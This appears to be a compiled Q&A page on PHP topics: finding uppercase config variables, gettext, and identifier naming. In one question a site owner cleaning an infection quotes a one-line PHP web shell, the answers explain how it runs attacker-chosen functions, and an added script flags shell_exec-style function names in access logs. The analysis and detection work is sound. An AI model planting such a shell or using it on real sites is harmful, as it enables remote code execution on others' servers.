Detect all uppercase variables in PHP project (and replace with something else) - php

Firstly - some background. We have a config.php file which lists several variables and settings in this format:
$MY_EMAIL_ADDRESS = 'test@test.com';
$MY_WEBSITE = 'www.test.com';
$SOMETHING_ELSE = 'foobar';
I would like to replace them with more sensible (and secure) names as part of an array, throughout the entire PHP project. Mostly so we can do this more securely: Get PHP variable value via Ajax with variable name as parameter
We have also forgotten some of these variable names, so they are used throughout the project but possibly not documented - hence doing a search one by one will prove difficult.
Is there a way I can search the php files for any values that start with a dollar sign ($) and then are made up of only upper case letters and possibly underscores?
$MY_SETTING_NAME
We could then either build a list and update manually, or build some kind of script to replace things with a more sensible way of working:
$CONFIG['MY_SETTING_NAME']
Thank you!

You can use the get_defined_vars function, which will return all variables as an array.
Please look at the php.net website for an example.
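An added example, not code from the question or the answer above: a Python script that does the search the question asks for and the $CONFIG['NAME'] rewrite. It carries a small scanner so that comments and single-quoted strings are left alone, while a setting interpolated in a double-quoted string gets the {$CONFIG['NAME']} form PHP requires there. It assumes the project uses neither heredoc/nowdoc strings nor PHP 8 #[...] attributes; the array name CONFIG and the sample source are mine.

```python
import re

# $NAME where NAME starts with a capital letter and continues with capitals,
# digits or underscores. Superglobals ($_GET, $_POST, ...) start with an
# underscore and never match; $GLOBALS does, so it is excluded explicitly.
UPPER_VAR = re.compile(r"\$([A-Z][A-Z0-9_]*)\b")
RESERVED = {"GLOBALS"}
# Where a string or comment begins; the scanner must not rewrite inside those.
SPECIAL = re.compile(r"'|\"|#|//|/\*")


def _segments(src):
    """Split PHP source into (kind, text) runs: 'code', 'sq' (single-quoted
    string), 'dq' (double-quoted string) or 'comment'. Assumption: no
    heredoc/nowdoc strings and no PHP 8 #[...] attributes in the project."""
    i, n = 0, len(src)
    while i < n:
        ch = src[i]
        if ch in "'\"":
            j = i + 1
            while j < n and src[j] != ch:
                if src[j] == "\\":          # skip the escaped character
                    j += 1
                j += 1
            yield ("dq" if ch == '"' else "sq"), src[i:j + 1]
            i = j + 1
        elif ch == "#" or src.startswith("//", i):
            j = src.find("\n", i)
            j = n if j < 0 else j
            yield "comment", src[i:j]
            i = j
        elif src.startswith("/*", i):
            j = src.find("*/", i + 2)
            j = n if j < 0 else j + 2
            yield "comment", src[i:j]
            i = j
        else:
            m = SPECIAL.search(src, i)
            j = m.start() if m else n
            yield "code", src[i:j]
            i = j


def find_upper_vars(src):
    """All-uppercase variables used in code or interpolated in double-quoted
    strings. Comments and single-quoted strings are ignored."""
    found = set()
    for kind, text in _segments(src):
        if kind in ("code", "dq"):
            found.update(UPPER_VAR.findall(text))
    return found - RESERVED


def _replace(text, array_name, skip, braces):
    def repl(m):
        name = m.group(1)
        if name in skip:
            return m.group(0)
        new = "$%s['%s']" % (array_name, name)
        return "{" + new + "}" if braces else new  # {$CONFIG['X']} inside "..."
    return UPPER_VAR.sub(repl, text)


def rewrite(src, array_name="CONFIG"):
    """$MY_SETTING -> $CONFIG['MY_SETTING'] in code, {$CONFIG['MY_SETTING']}
    inside double-quoted strings (PHP needs the braces there). Running it
    again on its own output changes nothing, because $CONFIG is skipped."""
    skip = RESERVED | {array_name}
    out = []
    for kind, text in _segments(src):
        if kind in ("code", "dq"):
            text = _replace(text, array_name, skip, kind == "dq")
        out.append(text)
    return "".join(out)


# Constructed sample in the shape of the config.php from the question.
SAMPLE = """<?php
$MY_EMAIL_ADDRESS = 'test@test.com';
$MY_WEBSITE = 'www.test.com';   // $NOT_A_VAR: only a comment
$page = $_GET['page'];
echo "Mail: $MY_EMAIL_ADDRESS";
echo '$LITERAL is not interpolated';
$camelCase = $GLOBALS['x'];
"""

if __name__ == "__main__":
    print(sorted(find_upper_vars(SAMPLE)))   # ['MY_EMAIL_ADDRESS', 'MY_WEBSITE']
    print(rewrite(SAMPLE))
```

Run find_upper_vars over every file (for instance pathlib.Path('.').rglob('*.php')) to build the inventory the question wants, check that list for names that are uppercase but not settings, then apply rewrite and read the diff before committing. Note that get_defined_vars only reports variables that exist at the point where it is called, so it cannot find a setting referenced in a file that has not been included yet; a source scan does.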

Related

PhpStorm live template expression to convert current variable

So we can use expressions to transform other variables in live templates.
For example:
Is it possible to apply snakeCase to NAME directly? So whatever I type, gets converted into snake case? Desired result:
Tried snakeCase(NAME), snakeCase(String) and snakeCase(). None seemed to work. Maybe someone had it figured out?
No, it's not possible - you can't pass a variable to itself, it has to be either another live template variable (defined before) or some known value calculated based on clipboard content (snakeCase(clipboard())), file name (snakeCase(fileName())), name got from completion, etc.
If you would like to change the names of existing variables, you can try the String Manipulation plugin, for example.

What does this line of PHP code do?

I extracted this from a WordPress site that happened to be infected and is being cleaned up by me.
<?php ($_=@$_GET[page]).@$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.
It's a PHP shell. If you rewrite it, the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET, so it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here
Let's break this up a little bit:
($_=@$_GET[page]) . @$_($_POST[404]); First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = $_GET[page], $_ is a variable, and is being assigned = to the variable $_GET['page'], or perhaps the output of an anonymous function it references. If $_GET[page] does reference an anonymous function, the @ would be suppressing any errors from it.
The second expression, @ $_( $_POST[404] ); is starting off with error suppression @ of the anonymous function $_, which you can tell now is an anonymous function being called because it's followed by (. The argument passed to this function is $_POST['404'], and then the second parentheses just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps javascript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject javascript) for example. But, it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.
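An added example, mine rather than either answer's, of the log search the first answer suggests, extended to the variant actually found on this site (the function name arrives in page=, the argument in a POST field that access logs do not record). It parses constructed Apache-style log lines and flags any query value naming a command- or code-execution function, plus any page= value that is not one of the site's real page slugs; the slug allow-list, the function list and the log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One line of an Apache/nginx "combined" access log, as far as we need it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP callables an attacker would name in the "function" parameter of the
# one-liner. Any function works, so this is a high-confidence signal, not a
# complete one; pair it with the allow-list check below.
DANGEROUS = {
    "system", "shell_exec", "exec", "passthru", "popen", "proc_open", "pcntl_exec",
    "assert", "create_function", "call_user_func", "call_user_func_array",
    "file_put_contents", "file_get_contents", "fwrite", "unserialize",
    "base64_decode", "gzinflate", "str_rot13",
}


def suspicious_requests(lines, func_param="page", known_values=frozenset()):
    """Return (ip, timestamp, method, target, reasons) for every log line that
    looks like a call to the shell. Check 1: any query value that names a
    dangerous PHP function (catches both ?page=shell_exec and the tweeted
    ?2=shell_exec&1=whoami form). Check 2: the page parameter carries a value
    that is not one of the site's real page slugs (known_values)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                   # not a request line
        params = parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True)
        reasons = []
        for name, value in params:                     # parse_qsl %-decodes values
            if value.strip().lower() in DANGEROUS:
                reasons.append("%s=%s names a dangerous PHP function" % (name, value))
            elif name == func_param and known_values and value not in known_values:
                reasons.append("%s=%s is not a known page" % (name, value))
        if reasons:
            hits.append((m["ip"], m["ts"], m["method"], m["target"], reasons))
    return hits


# Constructed log lines: two normal page views, three shell calls, one probe.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /index.php?page=shell_exec HTTP/1.1" 200 77 "-" "curl/7.88.1"
198.51.100.9 - - [10/Oct/2023:14:02:11 +0000] "GET /file.php?2=shell_exec&1=whoami HTTP/1.1" 200 33 "-" "python-requests/2.31"
203.0.113.7 - - [10/Oct/2023:14:05:00 +0000] "POST /index.php?page=file%5Fput%5Fcontents HTTP/1.1" 200 1 "-" "curl/7.88.1"
192.0.2.4 - - [10/Oct/2023:14:06:30 +0000] "GET /index.php?page=contact HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:14:07:12 +0000] "POST /index.php?page=phpinfo HTTP/1.1" 200 40000 "-" "curl/7.88.1"
""".splitlines()

if __name__ == "__main__":
    for ip, ts, method, target, reasons in suspicious_requests(
            SAMPLE_LOG, known_values={"about", "contact"}):
        print(ip, ts, method, target, "; ".join(reasons))
```

A hit shows only that the shell was invoked, not what was run, because the argument travelled by POST; correlate the timestamps with file modification times and whatever process accounting the host keeps. The allow-list check is what catches a function the DANGEROUS set does not list, and URL-encoded names (file%5Fput%5Fcontents) are decoded before comparison so they do not slip past the grep in the first answer.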

Best method to recognize unused variables

I have code where I use some variables. Example:
$name = "someName";
$output = sprintf($doingText, $name); // $doingText is here undefined
I want to search the code for surely undefined variables (some sort of static code analysing).
These variables should all be some language text. No problem up to there, but I don't want to manually make a list of which variables exist: I want to get the variable names and then make some HTML form where I can see them and put them into a database in variablename-text pairs.
Question is: how to search them? (I haven't found any script which is able to do this in PHP by googling...)
(P.S.: I don't know what the best method to search for them is, as there may not only be assignments with =, but also with foreach ($arr as $val) etc.)
Why not use an IDE like NetBeans? That will actively check if you have unused variables. So while you're coding it will show you in real time, rather than finishing the script and finding out you have x amount of errors/unused variables. Just food for thought.

Is there a limit in PHP to the length of a variable name or function name?

If I wanted to write a really long variable name like:
$this_is_my_variable_that_does_something_in_the_following_function_and_provides_some_information_with_which_the_function_relies_upon_to_do_all_the_work_it_needs = null;
Would that work? Same question for function/method names.
Generally, such a limit is imposed by the threat of violence from other folks who interact with your code.
From the documentation:
Variable names follow the same rules as other labels in PHP. A valid variable name starts with a letter or underscore, followed by any number of letters, numbers, or underscores.
The same is the case for function names, as stated here.
The limit in variable/function/method/class name length does not exist.
Comments above state that this property should not be exploited. That is true only when it comes to human-readable, human-maintainable code.
However, this is an extremely useful feature of PHP that is exploited very well in a lot of very popular projects, such as Twig, for example, which generates classes; example (a snippet):
class __TwigTemplate_9601167421099bbb502d119e674fed3fb71769eef256903648c9c2b4b6faa436 extends \Twig_Template {
protected function doDisplay(array $context, array $blocks = array())
{
$__internal_0abebc74dd811fd7b4cfa4c6a2fdf870d7723c04e8daf6926b04914d6644935f = $this->env->getExtension("native_profiler");
}
}
I had the opportunity to benefit from the same property in my projects as well.
In conclusion:
There is no limit in var/func/class name length
It is extremely useful language feature
There is a context for its usage; of course, it is not for everyday work
There is no limit, but it is highly discouraged as it creates unreadable code...
PHP does not impose a length limit on its identifiers.
That said, I'm not sure why anybody would ever want to create a 160 character variable name. I hope this is a hypothetical question.
PHP doesn't have any restriction on variable name length. And my suggestion is that a variable name should reflect the definition of the data which you are going to store in it.

i18n on a variable

I would like to know if I can use a gettext function on a variable with PHP?
e.g.: echo _($var);
Feel free to. But you need to make sure the possible contents of the variable make it into the .po/.mo files. (One of the ways to assure this is to create a dummy file, never processed except by xgettext, containing _("translate me"); expressions.)
I don't think gettext will recognize a variable since it scans the source code. If you want to include variables in a string, it's better to use
sprintf()
For example
echo sprintf(_("There are %d results!"), $numResults);
In gettext, the translator will see
There are %d results!
so it can easily be translated as long as he/she knows that %d is a variable. When the script gets executed, gettext will first replace the translation, and then sprintf will insert the variable $numResults. Good luck! I just got done internationalizing my site.
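An added example, not from the question or either answer: a Python check for the xgettext limitation both answers describe. It lists the _() and gettext() calls with a literal argument (the ones xgettext extracts) and the calls with a variable argument (which it misses), and generates the dummy PHP file the first answer recommends, one _() call per value the variable can take. The sample source and the values are constructed.

```python
import re

# A string-literal argument to _() or gettext(): the only form xgettext
# extracts into the .po file.
LITERAL_CALL = re.compile(
    r"""\b(?:_|gettext)\(\s*(['"])((?:\\.|(?!\1).)*)\1\s*[,)]"""
)
# A variable argument: xgettext never sees its value.
VARIABLE_CALL = re.compile(r"\b(?:_|gettext)\(\s*(\$[A-Za-z_]\w*)")


def extract_msgids(src):
    """Return (literal msgids xgettext would extract, variables passed to _()
    that it would miss) for one PHP source string."""
    literals = [m.group(2) for m in LITERAL_CALL.finditer(src)]
    variables = [m.group(1) for m in VARIABLE_CALL.finditer(src)]
    return literals, variables


def dummy_file(messages):
    """PHP source that is never included, only scanned by xgettext: one _()
    call per value the variable can take, so each reaches the .po file."""
    lines = ["<?php", "// Never executed; exists only so xgettext extracts these."]
    for msg in messages:
        escaped = msg.replace("\\", "\\\\").replace("'", "\\'")   # PHP single-quote escaping
        lines.append("_('%s');" % escaped)
    return "\n".join(lines) + "\n"


# Constructed sample mixing the extractable and non-extractable forms.
SAMPLE = r"""<?php
echo sprintf(_("There are %d results!"), $numResults);
echo _('Welcome back');
$status = $order->status;        // one of 'shipped', 'pending'
echo _($status);                 // correct at runtime, invisible to xgettext
echo gettext("Goodbye");
"""

if __name__ == "__main__":
    literals, variables = extract_msgids(SAMPLE)
    print(literals, variables)
    print(dummy_file(["shipped", "pending"]))
```

Commit the generated file next to the real sources and include it in the xgettext run; at runtime _($status) then finds its translation because 'shipped' and 'pending' now have msgid entries.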
